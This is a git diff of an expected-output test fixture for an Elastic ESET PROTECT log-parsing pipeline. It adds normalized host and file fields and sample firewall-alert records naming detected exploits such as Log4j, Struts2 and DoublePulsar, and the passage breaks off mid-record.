b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json @@ -46,6 +46,16 @@ "indicator" ] }, + "file": { + "directory": "/Users/Administrator/Downloads/xls/", + "drive_letter": "C", + "name": "YICT080714.xls", + "path": "C:/Users/Administrator/Downloads/xls/YICT080714.xls", + "type": "file", + "hash": { + "sha1": "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" + } + }, "group": { "name": "All/Lost & found" }, @@ -55,6 +65,7 @@ "ip": [ "192.168.30.30" ], + "name": "030-mg", "os": { "name": "Microsoft Windows 11 Pro" } 
@@ -65,7 +76,7 @@ }, "related": { "hash": [ - "5B97884A45C6C05F93B22C4059F3D9189E88E8B7" + "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" ], "hosts": [ "030-mg", @@ -86,7 +97,7 @@ "indicator": { "file": { "hash": { - "sha1": "5B97884A45C6C05F93B22C4059F3D9189E88E8B7" + "sha1": "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" } }, "first_seen": "2021-06-21T09:46:14.000Z", @@ -155,6 +166,7 @@ "ip": [ "192.168.30.30" ], + "name": "w16test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -243,6 +255,7 @@ "ip": [ "192.168.30.181" ], + "name": "test-w10-uefi", "os": { "name": "Microsoft Windows 11 Pro" } @@ -312,6 +325,7 @@ "ip": [ "192.168.30.30" ], + "name": "030-mg", "os": { "name": "Microsoft Windows 11 Pro" } @@ -319,6 +333,7 @@ "message": "Authenticating native user 'Administrator'.", "related": { "hosts": [ + "030-mg", "030-MG", "72cdf05f-f9c8-49cc-863d-c6b3059a9e8e" ], @@ -401,6 +416,7 @@ "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -412,7 +428,7 @@ }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", @@ -482,11 +498,13 @@ "name": "All/Lost & found" }, "host": { - "hostname": "shdsolec.vddjc", + "domain": "vddjc", + "hostname": "shdsolec", "id": "csd77ad2-2453-42f4-80a4-d86dfa9d0543", "ip": [ "192.168.30.30" ], + "name": "shdsolec.vddjc", "os": { "name": "Microsoft Windows 11 Pro" } @@ -498,6 +516,7 @@ "related": { "hosts": [ "shdsolec.vddjc", + "shdsolec", "csd77ad2-2453-42f4-80a4-d86dfa9d0543" ], "ip": [ @@ -562,6 +581,7 @@ "ip": [ "175.16.199.1" ], + "name": "testingpc", "os": { "name": "Microsoft Windows 11 Pro" } 
@@ -633,6 +653,16 @@ "indicator" ] }, + "file": { + "directory": "/Users/Administrator/Downloads/", + "drive_letter": "C", + "name": "malicious.exe", + "path": "C:/Users/Administrator/Downloads/malicious.exe", + "type": "file", + "hash": { + "sha1": "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" + } + }, "group": { "name": "All/Lost & found" }, @@ -642,6 +672,7 @@ "ip": [ "192.168.30.31" ], + "name": "031-mg", "os": { "name": "Microsoft Windows 10 Pro" } @@ -652,7 +683,7 @@ }, "related": { "hash": [ - "8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9" + "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" ], "hosts": [ "031-mg", @@ -673,7 +704,7 @@ "indicator": { "file": { "hash": { - "sha1": "8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9" + "sha1": "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" } }, "first_seen": "2021-06-21T09:47:29.000Z", @@ -742,6 +773,7 @@ "ip": [ "192.168.30.31" ], + "name": "firewall-test", "os": { "name": "Microsoft Windows 10 Pro" } @@ -845,6 +877,7 @@ "ip": [ "192.168.30.31" ], + "name": "firewall-test", "os": { "name": "Microsoft Windows 10 Pro" } 
@@ -896,6 +929,1349 @@ "sightings": 5 } } + }, + { + "@timestamp": "2024-03-15T18:49:08.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine1.domain.com", + "inbound": true, + "ipv4": "1.128.0.5", + "is_handled": false, + "name": "Suspected botnet detected", + "occured": "2024-03-15T18:49:08.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Fatal", + "source_address": "192.168.101.2", + "source_address_type": "IPv4", + "source_port": 53884, + "source_uuid": "ca28cf94-2696-44e6-bb0a-1325b09c562f", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 443, + "threat_name": "EK-Mozi", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"1.128.0.5\",\"hostname\":\"machine1.domain.com\",\"source_uuid\":\"ca28cf94-2696-44e6-bb0a-1325b09c562f\",\"occured\":\"15-Mar-2024 18:49:08\",\"severity\":\"Fatal\",\"event\":\"Suspected botnet detected\",\"source_address\":\"192.168.101.2\",\"source_address_type\":\"IPv4\",\"source_port\":53884,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":443,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"EK-Mozi\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine1", + "id": "ca28cf94-2696-44e6-bb0a-1325b09c562f", + "ip": [ + "1.128.0.5" + ], + "name": "machine1.domain.com" + }, + "message": "Suspected botnet detected", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine1.domain.com", + "machine1", 
+ "ca28cf94-2696-44e6-bb0a-1325b09c562f" + ], + "ip": [ + "1.128.0.5", + "192.168.101.2" + ] + }, + "source": { + "ip": "192.168.101.2", + "port": 53884 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "EK-Mozi", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:47:28.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:47:28.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 59840, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 80, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:47:28\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":59840,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":80,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + 
"hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 59840 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:36:47.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8090 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\LOCAL SERVICE", + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:36:47.000Z", + "processname": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 57313, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8090, + "threat_name": "HTTP/Exploit.CVE-2021-41773", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": 
"{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:36:47\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":57313,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8090,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\LOCAL SERVICE\",\"process_name\":\"C:\\\\Program Files (x86)\\\\Schneider Electric\\\\Floating License Manager\\\\FLEXnet Publisher License Server Manager\\\\lmadmin.exe\",\"inbound\":true,\"threat_name\":\"HTTP/Exploit.CVE-2021-41773\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "name": "lmadmin.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\LOCAL SERVICE" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 57313 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "HTTP/Exploit.CVE-2021-41773", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:31:03.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 
47001 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:31:03.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 56800, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 47001, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 10:31:03\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":56800,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":47001,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + 
"source": { + "ip": "192.168.9.254", + "port": 56800 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:20:29.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 3128 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:20:29.000Z", + "processname": "C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 55682, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 3128, + "threat_name": "HTTP/Exploit.CVE-2021-41773", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 10:20:29\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":55682,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":3128,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\SYSTEM\",\"process_name\":\"C:\\\\Program Files\\\\Apache HTTP 
Proxy\\\\bin\\\\httpd.exe\",\"inbound\":true,\"threat_name\":\"HTTP/Exploit.CVE-2021-41773\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe", + "name": "httpd.exe" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 55682 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "HTTP/Exploit.CVE-2021-41773", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:08:15.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:08:15.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 51937, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 445, + "threat_name": "SMB.CVE-2011-1267", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + 
"intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:08:15\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":51937,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB.CVE-2011-1267\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 51937 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB.CVE-2011-1267", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:00:42.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 47001 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine4", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:00:42.000Z", + 
"processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 64616, + "source_uuid": "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 47001, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine4\",\"source_uuid\":\"c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e\",\"occured\":\"14-Mar-2024 10:00:42\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":64616,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":47001,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "machine4", + "id": "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e", + "ip": [ + "192.168.30.31" + ], + "name": "machine4" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine4", + "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 64616 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:52:36.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": 
"Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:52:36.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 59912, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 445, + "threat_name": "SMB.CVE-2011-1267", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 09:52:36\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":59912,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB.CVE-2011-1267\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + 
"192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 59912 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB.CVE-2011-1267", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:11:13.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8090 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\LOCAL SERVICE", + "aggregate_count": 4, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:11:13.000Z", + "processname": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8090, + "threat_name": "JAVA/Exploit.CVE-2021-44228", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 09:11:13\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8090,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\LOCAL SERVICE\",\"process_name\":\"C:\\\\Program Files 
(x86)\\\\Schneider Electric\\\\Floating License Manager\\\\FLEXnet Publisher License Server Manager\\\\lmadmin.exe\",\"inbound\":true,\"threat_name\":\"JAVA/Exploit.CVE-2021-44228\",\"aggregate_count\":4}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "name": "lmadmin.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\LOCAL SERVICE" + ] + }, + "source": { + "ip": "192.168.9.254" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "JAVA/Exploit.CVE-2021-44228", + "provider": "ESET PROTECT", + "sightings": 4 + } + } + }, + { + "@timestamp": "2024-03-14T09:34:21.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:34:21.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 50505, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": 
"IPv4", + "target_port": 445, + "threat_name": "SMB/Exploit.DoublePulsar.B", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 09:34:21\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":50505,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB/Exploit.DoublePulsar.B\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 50505 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB/Exploit.DoublePulsar.B", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:15:30.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8813 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 
